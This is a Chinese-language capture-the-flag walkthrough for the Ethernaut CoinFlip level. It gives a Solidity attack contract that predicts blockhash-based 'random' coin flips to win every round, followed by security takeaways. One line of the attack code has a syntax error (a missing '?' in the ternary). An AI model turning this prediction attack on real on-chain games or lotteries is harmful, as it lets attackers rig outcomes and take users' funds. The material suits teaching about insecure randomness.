如何防止滥用智能合约中的伪随机性

请注意，在我们的Ethernaut练习中，n = 2代表硬币翻转的两面。

这种在智能合约中导出伪随机性的方法很容容易受到攻击。如果知道输入的黑客可以结此猜出“随机”结果。

这就是解决CoinFlip级别的关键。 在这里，确定硬币翻转的输入变量对于您来说是公开的。

详情演练

我们来创建一个恶意智能合约，检查硬币翻转的结果。

只有当你正确猜到了结果时，你才能调用真实合约的翻转（bool _guess）函数。

1、在Remix IDE中，创建一个与CoinFlip.sol相关的恶意合同：

contract hackCoinFlip {
CoinFlip public originalContract = CoinFlip(
"your instance address");
uint256 FACTOR = 578960446186580977117854925043439539266349923
32820282019728792003956564819968;

function hackFlip(bool _guess) public {
//TODO
}
}

2、实现hackFlip（）函数，使用与原始智能合约相同的逻辑和输入变量来预测翻转结果。 既然你知道blockhash和block.number，那么你就能准确预测正确的_guess。

function hackFlip(bool _guess) public {

// pre-deteremine the flip outcome
uint256 blockValue = uint256(block.blockhash(block.number-1));
uint256 coinFlip = blockValue / FACTOR;
bool side = coinFlip == 1 true : false;

// If I guessed correctly, submit my guess
if (side == _guess) {
originalContract.flip(_guess);
} else {
// If I guess incorrectly, submit the opposite
originalContract.flip(!_guess);
}
}

3、调用你的hackFlip（）函数10次。当您做出正确的猜测时，原始智能合约的consecutiveWins计数器应该逐步增加。

关键安全要点

1. 没有真的随机性。
2. 在计算智能合约中的“随机性”时（或者甚至从现有的随机数库继承）时要格外注意。 如果您使用随机性来确定比赛获胜者，请记住，对手可以轻松猜出随机结果并破解您的游戏！

—-

编译者/作者：不详

玩币族申明：玩币族作为开放的资讯翻译/分享平台，所提供的所有资讯仅代表作者个人观点，与玩币族平台立场无关，且不构成任何投资理财建议。文章版权归原作者所有。